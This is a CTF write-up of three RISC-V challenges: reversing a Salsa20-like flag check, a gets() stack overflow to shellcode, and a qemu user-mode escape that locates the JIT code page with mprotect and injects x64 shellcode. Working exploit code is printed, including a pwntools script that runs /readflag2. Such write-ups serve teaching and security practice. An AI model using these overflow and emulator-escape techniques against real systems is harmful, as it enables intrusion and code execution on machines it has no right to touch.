Last weekend sixstar team brought a series of RISC-V challenges in their CTF. As their name suggested, I enjoy playing RISC-V challenges very much, three flags could be found in the checkpoints:
- Favourite Architecture 0: Reverse challenge, 25 solved
- Favourite Architecture 1: Userspace pwn challenge, read
/home/pwn/flag
.24 solved - Favourite Architecture 2: Qemu userspace escape pwn challenge, execute
/readflag2
. 6 solved
Recon
The challenge designer provider a zip file that can be used to build docker image.
1 | Archive: c11db24e682f4d4d802f4a3ca9ca76b8.zip |
Generally, there are three important files:
main: riscv64 elf file
1 | ./main: ELF 64-bit LSB executable, UCB RISC-V, version 1 (SYSV), statically linked, for GNU/Linux 4.15.0, BuildID[sha1]=c54b93fd63fcb530ed539bd25e4322a08324b0b7, stripped |
The riscv64 file was compiled without any mitigations.
qemu-riscv64: patched qemu userspace emulator
The qemu-riscv64
is 5.2 version of qemu userapce emulator but with the following patch, it added a whitelist to only allowed a subset of syscalls.
1 | diff --git a/linux-user/syscall.c b/linux-user/syscall.c |
entry: launcher script
entry
is a bash script to launch the challenge.
1 |
|
Favourite Architecture 0
Unfortunately, my favorite reverse engineering tool ida pro still do not have support for this “favorite architecture”, but we can turn to the powerful ghidra, which already had nice support since version 9.2 released in November 2020: Ghidra: Release Notes
I was too lazy to update the new version and this challenge was finished with a developing version in August 2020, the old version is enough, and I guess the new release version should have better support for RISCV.
With the string Input the flag:
we can quickly locate the main function at 0x10400
, but it shows “Unknown Error” at the decompile window. Here is a little trick to work around this issue:
- Locate the function in which the
gp
value was set. In this case, is0x101ec
, this function can be decompiled automatically:1
2
3
4
5void FUN_000101ec(void)
{
gp = (undefined *)0x6f178;
return;
}
We can see that the gp
value was set to 0x6f178
, and this value will remain to be the same during running.
2. Press Ctrl-A
in the disassembly window to select all the code, and press Ctrl-R
to invoke the set register
window. In this window, we can set the correct gp value.
3. Go back to the main function at 0x10400
, and now it can be decompiled correctly.
The decompile result was pretty readable. With some guessing, we can identify the library functions and understanding the logic.
1 | undefined8 UndefinedFunction_00010400(void) |
So after getting the input, it first checks whether the length is 0x59
, and perform the verification in two steps:
- The input string will be processed with some kind of encryption with
0x1118a
and0x111ea
, and the result will be compared with a hex string at0x6e9d8
. - The last 0x30 byte of input string will be separated into 6 groups of qword, and passed to
0x102ae
with a key in0x6d060
, then the result will be compared with hex string in0x6d030
.
For the first part, we can track down0x1118a
and find some clue in0x106ce
:1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41void FUN_000106ce(longlong param_1,longlong param_2,longlong param_3)
{
undefined4 uVar1;
FUN_00021386(param_1 + 0x48,param_2,0x20);
FUN_00021386(param_1 + 0x68,param_3,0xc);
uVar1 = FUN_000105ce("expand 32-byte k");
*(undefined4 *)(param_1 + 0x80) = uVar1;
uVar1 = FUN_000105ce("nd 32-byte k");
*(undefined4 *)(param_1 + 0x84) = uVar1;
uVar1 = FUN_000105ce("2-byte k");
*(undefined4 *)(param_1 + 0x88) = uVar1;
uVar1 = FUN_000105ce("te k");
*(undefined4 *)(param_1 + 0x8c) = uVar1;
uVar1 = FUN_000105ce(param_2);
*(undefined4 *)(param_1 + 0x90) = uVar1;
uVar1 = FUN_000105ce(param_2 + 4);
*(undefined4 *)(param_1 + 0x94) = uVar1;
uVar1 = FUN_000105ce(param_2 + 8);
*(undefined4 *)(param_1 + 0x98) = uVar1;
uVar1 = FUN_000105ce(param_2 + 0xc);
*(undefined4 *)(param_1 + 0x9c) = uVar1;
uVar1 = FUN_000105ce(param_2 + 0x10);
*(undefined4 *)(param_1 + 0xa0) = uVar1;
uVar1 = FUN_000105ce(param_2 + 0x14);
*(undefined4 *)(param_1 + 0xa4) = uVar1;
uVar1 = FUN_000105ce(param_2 + 0x18);
*(undefined4 *)(param_1 + 0xa8) = uVar1;
uVar1 = FUN_000105ce(param_2 + 0x1c);
*(undefined4 *)(param_1 + 0xac) = uVar1;
*(undefined4 *)(param_1 + 0xb0) = 0;
uVar1 = FUN_000105ce(param_3);
*(undefined4 *)(param_1 + 0xb4) = uVar1;
uVar1 = FUN_000105ce(param_3 + 4);
*(undefined4 *)(param_1 + 0xb8) = uVar1;
uVar1 = FUN_000105ce(param_3 + 8);
*(undefined4 *)(param_1 + 0xbc) = uVar1;
FUN_00021386(param_1 + 0x68,param_3,0xc);
gp = (undefined *)0x6f178;
return;
}
It looks like the key initialization function, and we can search the const “expand 32-byte k”, and found that it is from the Salsa20: Salsa20
The encryption logic is quite similar, but some magic number seems does not match the generic algorithm. But the key point here is that Salsa20 is a symmetric algorithm, we can use the same logic to decrypt the ciphertext. So I simply send the hex string at 0x6d000
, which is 0x29 bytes long, and append with 0x30 \x00
. Then set a breakpoint when calling strcmp
to see the plaintext at the memory, it was flag{have_you_tried_ghidra9.2_decompiler_
For the second part, it turned out 0x102ae
is a naive encryption function with 10 round:
1 | void FUN_000102ae(uint *param_1,int *param_2) |
My first idea was to brute force the key because the first part of the flag suggested that it consisted of only the lower case alphabet. I even wrote a simple python script for this task, but it was too slow. Later, I realized that it was possible to reverse this function and write a decrypt function. So I wrote a simple C program to get the rest of the flag.
1 |
|
It printed _if_you_have_hexriscv_plz_share_it_with_me_thx:P}
, so the final flag for this checkpoint is flag{have_you_tried_ghidra9.2_decompiler_if_you_have_hexriscv_plz_share_it_with_me_thx:P}
Favourite Architecture 1
Before I analyzed the vulnerability, I saw that there was a moment when more teams solved Favourite Architecture 1 than 0, so the vulnerability is independent of the verification of reversing challenge. And it is pretty obvious for a sophisticated pwner to find the gets
function to receive input.
Because the binary itself does not have any mitigations, we can have many choices to achieve RCE, including the old school nop-sled technique. However, we want to get a stable trigger on the remote machine, so I spent some time to find a gadget that can hit the shellcode unconditionally. I chose to jump to 0x10442
, because we can control s0, and set the argument of gets
to some address on .bss, then when the main function finishes, we can pivot to bss and execute the shellcode receive from the second gets
.
1 | 010442 93 07 84 ed addi a5,s0,-0x128 |
The exploit is not complicated:
1 | from pwn import * |
sc.bin
contains the raw shellcode and can be generated by following assmbly code, which is modified from my previous writeup: https://matshao.com/2020/05/18/DEFCON-2020-Quals-nooopsled/
1 | # riscv64-linux-gnu-as sc.asm -o sc |
Favourite Architecture 2
This checkpoint is the highlight of the challenges. We are required to execute readflag2
to get the flag. We already get RCE in RISCV in the last checkpoint, but readflag2
is an x64
elf, so we need to get RCE from qemu-riscv64
to execute it.
The hint for this task is the syscall white list from the patch file, we are supposed to get RCE in qemu user space emulator with these syscalls..
1 | + case TARGET_NR_brk: |
I guess the purpose of this challenge is not to find some 0day in the qemu user emulator implementation, but more likely get RCE with some logic bugs. When attached gdb to qemu-riscv6i4
process and print the memory maps, we can see that there is a region with rwx
property ( 0x7fffe8000000-0x7fffeffff000). It is used for the JIT code generator. And if attach gdb to the gdb stubs from qemu user emulator, the vmmap command shows that all memroy is rwx
, though this result is not so convincing, it make me think of that maybe we could access the JIT code page from riscv user space. If it works, then we can write some x64 shellcode to the JIT code page and make the emulator execute it.
1 | vmmap of qemu-riscv64 |
1 | vmmap when connect to gdb stub provide by qemu-riscv64 |
But we need to know the address of JIT code page. My first idea is checking /proc/self/map
from riscv program. I wrote a simple program and compiled it as static riscv elf, then execute it with qemu-riscv64
. It seems that the emulator has special logic to deal with these proc file, we could not read any emulator address from it.
1 | 10000-6a000 r--p 00000000 00:35 144454 /pwn/test |
I also tried searching for JIT page pointer from 0x1000
to 4000801000
, but it does not work. I noticed that there is some memory-related syscall from the whitelist, maybe we can use them to search for the JIT page address? It sounds worth trying!
I wrote a simple function to brute-force the JIT code page address with mprotect. By running the emulator several time, we find the address can be divide by 0x000004000000
. Then the reason why we check the address of va+0x4000
instead of va
is that we the JIT code will locate from the start of the memory page, we need to avoid the running JIT code. Otherwise, the emulator will crash.
We compile the program as static riscv elf, and it successfully gives us the address of JIT page address.
1 | size_t test_map() { |
Then we add the x64 shellcode injection logic to test if we can hijack the control flow by writing JIT code page, we tried to inject a x64 shellcode to print “here”, and it did work.
1 |
|
1 | root@matthew-Virtual-Machine:/pwn# ./qemu-riscv64 ./test |
Well, from this experiment, we know that we can search for the JIT code page address with mprotect, and also write x64 shellcode to the page and get RCE from the emulator. Next step is to construct RISCV shellcode for the job.
1 | # riscv64-linux-gnu-as sc1.asm -o sc |
The assembly code works as follow:
- search for JIT code page with
mprotect(va+0xf000, 0x1000, 7)
, the offset is changed from 0x4000 to 0xf000, because we found that 0x4000 does not on remote machine. - receive x64 shellcode from read(0, 0x7000, 0x200)
- copy the x64 shellcode from 0x7000 to va, from higher address to lower address, avoiding ruin the running JIT code by accident.
And the python exploit is like:1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61from pwn import *
import re
context.terminal = ['tmux', 'splitw', '-h']
context.arch = 'amd64'
context.log_level = "debug"
env = {'LD_PRELOAD': ''}
if len(sys.argv) == 1:
p = process('./cmd')
is_remote = False
elif len(sys.argv) == 3:
p = remote(sys.argv[1], sys.argv[2])
is_remote = True
se = lambda data :p.send(data)
sa = lambda delim,data :p.sendafter(delim, data)
sl = lambda data :p.sendline(data)
sla = lambda delim,data :p.sendlineafter(delim, data)
sea = lambda delim,data :p.sendafter(delim, data)
rc = lambda numb=4096 :p.recv(numb)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr :p.info(tag + ': {:#x}'.format(addr))
if not is_remote:
time.sleep(0.5)
# subprocess.call(['tmux', 'split-window', '-h', 'gdb-multiarch', '-x', '1.gdb'])
pid = subprocess.check_output(['pidof', 'qemu-riscv64'])
pid = pid.strip()
subprocess.call(['tmux', 'split-window', '-h', 'gdb', 'attach', pid])
def update_sc():
subprocess.call(["./build_sc.sh"])
update_sc()
sc = open("sc.bin", "rb").read()
assert "\n" not in sc
gets = 0x16a5a
call_gets = 0x10442
data = cyclic(280) + p64(0x6f000 + 0x128)
data += p64(call_gets)
data += cyclic(504) + p64(0x6f000)
# data += p64()
time.sleep(0.5)
sla("flag:", data)
sl(sc)
time.sleep(0.5)
x86_shellcode = asm(shellcraft.linux.execve("/readflag2") + shellcraft.linux.exit())
# x86_shellcode = asm(shellcraft.amd64.infloop())
payload = "\x90"*0x100 + x86_shellcode
payload.ljust(0x200, "\x00")
se(payload)
p.interactive()
#flag{qemu_user_s4ndb0x_is_dangerous}
This will give us the last flag.